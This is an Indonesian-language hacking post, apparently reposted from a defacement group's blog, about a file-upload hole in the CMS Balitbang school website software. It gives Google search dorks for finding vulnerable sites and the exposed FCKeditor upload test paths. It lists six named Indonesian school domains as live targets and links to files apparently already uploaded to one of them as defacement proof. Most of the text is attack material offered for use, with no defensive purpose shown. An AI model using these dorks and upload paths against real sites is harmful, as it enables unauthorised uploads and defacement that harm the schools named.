CMS Balitbang File Upload, Sudah Lama Namun Masih Berlaku

Dork : inurl:"/html/siswa.php?"
inurl:"/html/alumni.php?"
inurl:"/html/guru.php?"

editor/filemanager/connectors/uploadtest.html
editor/filemanager/connectors/test.html

http://www.target.sch.id/editor/filemanager/connectors/uploadtest.html
http://www.target.sch.id/editor/filemanager/connectors/test.html

http://www.target.sch.id/userfiles/file/file.txt

http://www.sman1gombong.sch.id/editor/filemanager/connectors/test.html
http://www.sman1kotabaru.sch.id/editor/filemanager/connectors/uploadtest.html
http://www.sman10samarinda.sch.id/editor/filemanager/connectors/test.html
http://www.smpn10tarakan.sch.id/editor/filemanager/connectors/test.html
http://sman6bdg.sch.id/editor/filemanager/connectors/test.html
http://smansa-pringsewu.sch.id/editor/filemanager/connectors/test.html

text => http://www.sman1gombong.sch.id/userfiles/file/imcyber-team.txt
image => http://www.sman1gombong.sch.id/userfiles/image/indramayucyberteam.jpg


artikel ini tidak sama persis dengan aslinya, karena yang asli lebih sulit untuk dipahami. Courtesy of exploit-db

Sumber Artikel: http://imcyber-team.blogspot.com/#ixzz2g5inyoTb